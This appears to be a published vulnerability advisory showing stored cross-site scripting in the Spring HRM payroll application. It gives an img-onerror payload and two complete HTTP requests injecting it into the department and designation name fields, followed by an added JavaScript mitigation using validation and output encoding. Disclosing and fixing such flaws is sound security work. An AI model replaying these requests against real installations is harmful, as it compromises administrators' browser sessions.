# Exploit Title: Spring HRM - HRM & Payroll / Cross-site Scripting
# Date: 18/01/2022
# Exploit Author: Esra Nur SAYIM
# Vendor Homepage: https://www.springsoftit.com/
# Software Link: https://codecanyon.net/item/spring-hrm-hrm-payroll/35416929
# Version: 1.0
# Tested on: Windows 10 Enterprise 21H2, Ubuntu WSL 20
Vulnerability: https://{{DOMAIN}}/admin/add-department
Payload: "><img src=x onerror=alert('XSS')>
HTTP Request:
POST /admin/add-department HTTP/2
Host: {{HOST}}
Cookie: {{COOKIES}}
Content-Length: 56
Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99"
X-Csrf-Token: NtspEMEP3AifxPm7nQTY0I7LXK3AFVKXKyzfbJUV
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: {{HOST}}
Referer: {{HOST}}/admin/addDepartment
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

dept_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E
--------------------
Vulnerability: https://{{DOMAIN}}/admin/add-designation
Payload: "><img src=x onerror=alert('XSS')>
HTTP Request:
POST /admin/add-designation HTTP/2
Host: {{HOST}}
Cookie: {{COOKIES}}
Content-Length: 63
Sec-Ch-Ua: "Chromium";v="97", " Not;A Brand";v="99"
X-Csrf-Token: NtspEMEP3AifxPm7nQTY0I7LXK3AFVKXKyzfbJUV
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: {{HOST}}
Referer: {{HOST}}/admin/addDepartment
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

designation_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E
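
--------------------
Mitigation example: the two controls that neutralise the payload above, input validation and output encoding, applied to the dept_name and designation_name bodies from the requests. This is an added example, not part of the original advisory or the vendor's code; the function names and the name policy are assumptions, and the advisory does not show where the value is rendered.

```javascript
// Added example. Field names and bodies come from the requests above;
// escapeHtml, reviewBody and NAME_POLICY are hypothetical names.

// Constructed sample: the two request bodies shown in the advisory.
const SAMPLE_BODIES = [
  "dept_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E",
  "designation_name=%22%3E%3Cimg+src%3Dx+onerror%3Dalert('XSS')%3E",
];

// Fields the advisory reports as injectable.
const NAME_FIELDS = ["dept_name", "designation_name"];

// Assumed policy: letters, digits, spaces and a little punctuation, 1-100 chars.
const NAME_POLICY = /^[\p{L}\p{N} .,&()-]{1,100}$/u;

// Encode the five characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Decode a form body the way the server would, then check each name field.
function reviewBody(body) {
  const params = new URLSearchParams(body);
  const findings = [];
  for (const field of NAME_FIELDS) {
    if (!params.has(field)) continue;
    const value = params.get(field);
    findings.push({
      field,
      value,                              // decoded value the application receives
      accepted: NAME_POLICY.test(value),  // input validation: reject before saving
      rendered: escapeHtml(value),        // output encoding: inert if it is rendered
    });
  }
  return findings;
}

for (const body of SAMPLE_BODIES) {
  for (const f of reviewBody(body)) {
    console.log(`${f.field}: accepted=${f.accepted} rendered=${f.rendered}`);
  }
}
```

Validation alone is not enough if values saved before the fix are already in the database, so the encoding step belongs at every place the name is written into HTML.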